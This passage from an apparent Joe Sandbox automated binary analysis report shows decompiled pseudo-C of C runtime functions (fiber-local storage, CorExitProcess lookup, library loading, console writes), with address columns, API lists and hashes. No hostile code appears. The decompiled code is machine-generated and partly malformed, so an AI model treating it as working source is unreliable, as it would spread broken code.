					_t11 = E00256006(_t13,  *0x264064);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00256041(_t14,  *0x264064, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00250F82();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00256041(_t18,  *0x264064, 0);
								} else {
									_t8 = E00256041(_t18,  *0x264064, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E00250F8D(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                                                                                                          0x00251cbc
                                                                                                                          0x00251cc3
                                                                                                                          0x00251cd6
                                                                                                                          0x00251cdd
                                                                                                                          0x00251cdf
                                                                                                                          0x00251ce3
                                                                                                                          0x00251cfc
                                                                                                                          0x00251cfc
                                                                                                                          0x00251ce5
                                                                                                                          0x00251ce7
                                                                                                                          0x00251cfa
                                                                                                                          0x00251d01
                                                                                                                          0x00251d0a
                                                                                                                          0x00251d0d
                                                                                                                          0x00251d10
                                                                                                                          0x00251d24
                                                                                                                          0x00251d24
                                                                                                                          0x00251d2d
                                                                                                                          0x00251d12
                                                                                                                          0x00251d19
                                                                                                                          0x00251d1f
                                                                                                                          0x00251d22
                                                                                                                          0x00251d36
                                                                                                                          0x00251d38
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00251d22
                                                                                                                          0x00251d3b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00251cfa
                                                                                                                          0x00251ce7
                                                                                                                          0x00251d43
                                                                                                                          0x00251d4d
                                                                                                                          0x00251cc5
                                                                                                                          0x00251cc7
                                                                                                                          0x00251cc7

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,00251CB3,0024DD73,0024D8CB), ref: 00251CCA
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00251CD8
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00251CF1
                                                                                                                          • SetLastError.KERNEL32(00000000,00251CB3,0024DD73,0024D8CB), ref: 00251D43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          • Opcode ID: 37c846afd4853ed79337b40909045f3f3bf9323891cc20f549a28949c43cc61b
                                                                                                                          • Instruction ID: 0bab634ebcf874ac78f7f6b916e45b4a5425187946b473ce05b3699d1fbe497b
                                                                                                                          • Opcode Fuzzy Hash: 37c846afd4853ed79337b40909045f3f3bf9323891cc20f549a28949c43cc61b
                                                                                                                          • Instruction Fuzzy Hash: D001883223A3326E96382A757C9E66626A4DB41777730422AFE10450E1EEB14C79564C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024B460 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BitmapCaretCreateDeleteDestroyFocusObject
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 3626877506-2564639436
                                                                                                                          • Opcode ID: 5179f21518da6b01083f01724cc82722e11005f39bdeff9b745b27807fa5048a
                                                                                                                          • Instruction ID: 4726ef6040d5b45ca879b075fa90dff7ebd7d4a25bc669ae38ace49354d85347
                                                                                                                          • Opcode Fuzzy Hash: 5179f21518da6b01083f01724cc82722e11005f39bdeff9b745b27807fa5048a
                                                                                                                          • Instruction Fuzzy Hash: 7471B374A002199FCB08CF58C498AADBBF1FF48315F1584A9E889DB352D775EA91CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002433B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: System
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 3470857405-2679148245
                                                                                                                          • Opcode ID: 5718e81a2d9beb01916fa9bc032357b15c4c9f4db6e7b310c552afa908d9ec4d
                                                                                                                          • Instruction ID: b7ff786781a64fb54029c490044b3a1ea445992f0500fa9f76e59dc2bc131973
                                                                                                                          • Opcode Fuzzy Hash: 5718e81a2d9beb01916fa9bc032357b15c4c9f4db6e7b310c552afa908d9ec4d
                                                                                                                          • Instruction Fuzzy Hash: E7414EB4104208EFD740EF18D198B9ABBE0FB48314F01C45AEC688B362D7BAE958CF41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0025005C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 25%
                                                                                                                          			E0025005C(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x264050; // 0xbb40e64e
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x25af76, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x267000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                                                                                                          0x00250071
                                                                                                                          0x0025007c
                                                                                                                          0x00250082
                                                                                                                          0x00250086
                                                                                                                          0x00250091
                                                                                                                          0x00250099
                                                                                                                          0x002500a3
                                                                                                                          0x002500a9
                                                                                                                          0x002500ad
                                                                                                                          0x002500b4
                                                                                                                          0x002500ba
                                                                                                                          0x002500ba
                                                                                                                          0x002500ad
                                                                                                                          0x002500c0
                                                                                                                          0x002500c5
                                                                                                                          0x002500c5
                                                                                                                          0x002500ce
                                                                                                                          0x002500d8

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0025AF76,000000FF,?,00250126,0024FFC1,?,002501C2,00000000), ref: 00250091
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002500A3
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,0025AF76,000000FF,?,00250126,0024FFC1,?,002501C2,00000000), ref: 002500C5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                          • Opcode ID: d71a06f8f7f7af9b450b1035889f017779ee5643b6f28663ec979447f3e28b89
                                                                                                                          • Instruction ID: db54d87c427e64cf6323886f6b6004d5fd35368d300d239980035a3aa047ff8e
                                                                                                                          • Opcode Fuzzy Hash: d71a06f8f7f7af9b450b1035889f017779ee5643b6f28663ec979447f3e28b89
                                                                                                                          • Instruction Fuzzy Hash: 7F01D631924615EFCB119F50EC49FAFBBB8FB05B16F044629FC11A22E0EBB49D14CA94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024A490 Relevance: 7.5, APIs: 5, Instructions: 47windowclipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnableItemMenu$AvailableClipboardFormat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4217543366-0
                                                                                                                          • Opcode ID: b24e4adbb8a0b79ab8bda35df6b1dab484c7a2d48b6a19325389c201a0ae40d3
                                                                                                                          • Instruction ID: 869a4426e68a493313dc1ead7b316119c5be50a4a2ed731370f95a878ac8d02e
                                                                                                                          • Opcode Fuzzy Hash: b24e4adbb8a0b79ab8bda35df6b1dab484c7a2d48b6a19325389c201a0ae40d3
                                                                                                                          • Instruction Fuzzy Hash: C6119874604204AFD744EF68E59979EBBE0EB84701F00C42DEC898B394DBB5E8549B56
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002431F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41timewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostTimer
                                                                                                                          • String ID: 2$2
                                                                                                                          • API String ID: 2370412193-3784399050
                                                                                                                          • Opcode ID: a6cef7de69ba1927510a0bafc3709e1ea8fddca4141f8a194fb355b5096c2fa9
                                                                                                                          • Instruction ID: 9e3a65c7e94f64b475d7dd7a810c6fcf2359612d3fa427667e83ae0c756d7257
                                                                                                                          • Opcode Fuzzy Hash: a6cef7de69ba1927510a0bafc3709e1ea8fddca4141f8a194fb355b5096c2fa9
                                                                                                                          • Instruction Fuzzy Hash: 93119374214205EFE704EF58D148BA97BE0BB44354F45C4A9EC8D8B2A1D7B5EA98CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002560C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E002560C6(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00254A99(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                                                                                          0x002560d3
                                                                                                                          0x002560db
                                                                                                                          0x00256110
                                                                                                                          0x002560dd
                                                                                                                          0x002560e6
                                                                                                                          0x00000000
                                                                                                                          0x0025610d
                                                                                                                          0x0025610c
                                                                                                                          0x0025610c

                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00256162,?,?,00000000,?,?,?,00255FAA,00000000,FlsAlloc,0025D668,0025D670), ref: 002560D3
                                                                                                                          • GetLastError.KERNEL32(?,00256162,?,?,00000000,?,?,?,00255FAA,00000000,FlsAlloc,0025D668,0025D670,?,=:%,00251C6A), ref: 002560DD
                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,=:%,00251C6A,00251D4E,00000003,002514CB,?,?,?,?,00000000,00000000,00000000), ref: 00256105
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID: api-ms-
                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                          • Opcode ID: 1d56d6dcaf3ecddb30d5ffaf98480811b3f34557cdc3d65dac7d6533f8928224
                                                                                                                          • Instruction ID: f6e4af252758ea1e324adb0b8184312ab66ad7fd13c7b306b2b3d30c09ea8433
                                                                                                                          • Opcode Fuzzy Hash: 1d56d6dcaf3ecddb30d5ffaf98480811b3f34557cdc3d65dac7d6533f8928224
                                                                                                                          • Instruction Fuzzy Hash: 31E01270690205B7DF101F61FC0EB683B54AB00B95F54C020FD0DA91E1DBB1A9749688
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00256A01 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00256A01(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0x25afcd);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x264050; // 0xbb40e64e
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x2662e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E002514D0(_t265, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x2662e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x2662e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x2662e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E00258785(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00258785(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x2647b0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x2662e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E002589C0( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x2647b0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x2662e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E0024F6F0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x2662e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E002589C0( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00255A69(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E0024DB65(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































                                                                                                                          0x00256a06
                                                                                                                          0x00256a08
                                                                                                                          0x00256a13
                                                                                                                          0x00256a14
                                                                                                                          0x00256a17
                                                                                                                          0x00256a1c
                                                                                                                          0x00256a1e
                                                                                                                          0x00256a24
                                                                                                                          0x00256a28
                                                                                                                          0x00256a2e
                                                                                                                          0x00256a33
                                                                                                                          0x00256a39
                                                                                                                          0x00256a3c
                                                                                                                          0x00256a3f
                                                                                                                          0x00256a42
                                                                                                                          0x00256a45
                                                                                                                          0x00256a48
                                                                                                                          0x00256a52
                                                                                                                          0x00256a59
                                                                                                                          0x00256a61
                                                                                                                          0x00256a64
                                                                                                                          0x00256a6a
                                                                                                                          0x00256a6e
                                                                                                                          0x00256a71
                                                                                                                          0x00256a75
                                                                                                                          0x00256a75
                                                                                                                          0x00256a7d
                                                                                                                          0x00256a85
                                                                                                                          0x00256a8a
                                                                                                                          0x00256a8b
                                                                                                                          0x00256a8c
                                                                                                                          0x00256a8d
                                                                                                                          0x00256a90
                                                                                                                          0x00256a92
                                                                                                                          0x00256a98
                                                                                                                          0x00256a9e
                                                                                                                          0x00256aa1
                                                                                                                          0x00256aa3
                                                                                                                          0x00256aa6
                                                                                                                          0x00256aaf
                                                                                                                          0x00256ab5
                                                                                                                          0x00256ab8
                                                                                                                          0x00256abf
                                                                                                                          0x00256ac6
                                                                                                                          0x00256ac9
                                                                                                                          0x00256c03
                                                                                                                          0x00256c07
                                                                                                                          0x00256c0a
                                                                                                                          0x00256c2d
                                                                                                                          0x00256c33
                                                                                                                          0x00256c35
                                                                                                                          0x00256c39
                                                                                                                          0x00256c6a
                                                                                                                          0x00256c6d
                                                                                                                          0x00256c6f
                                                                                                                          0x00000000
                                                                                                                          0x00256c3b
                                                                                                                          0x00256c3b
                                                                                                                          0x00256c3e
                                                                                                                          0x00256c41
                                                                                                                          0x00256c44
                                                                                                                          0x00256d8e
                                                                                                                          0x00256d9c
                                                                                                                          0x00256da5
                                                                                                                          0x00256c4a
                                                                                                                          0x00256c54
                                                                                                                          0x00256c59
                                                                                                                          0x00256c5c
                                                                                                                          0x00256c5f
                                                                                                                          0x00256c65
                                                                                                                          0x00000000
                                                                                                                          0x00256c65
                                                                                                                          0x00256c5f
                                                                                                                          0x00256c44
                                                                                                                          0x00256c0c
                                                                                                                          0x00256c13
                                                                                                                          0x00256c16
                                                                                                                          0x00256c19
                                                                                                                          0x00256c1b
                                                                                                                          0x00256c1e
                                                                                                                          0x00256c25
                                                                                                                          0x00256c27
                                                                                                                          0x00256c70
                                                                                                                          0x00256c73
                                                                                                                          0x00256c74
                                                                                                                          0x00256c79
                                                                                                                          0x00256c7c
                                                                                                                          0x00256c7f
                                                                                                                          0x00256c85
                                                                                                                          0x00000000
                                                                                                                          0x00256c85
                                                                                                                          0x00256c7f
                                                                                                                          0x00256acf
                                                                                                                          0x00256ad2
                                                                                                                          0x00256ad4
                                                                                                                          0x00256ad6
                                                                                                                          0x00256ada
                                                                                                                          0x00256adb
                                                                                                                          0x00256adf
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00256adf
                                                                                                                          0x00256ae4
                                                                                                                          0x00256ae6
                                                                                                                          0x00256aeb
                                                                                                                          0x00256bab
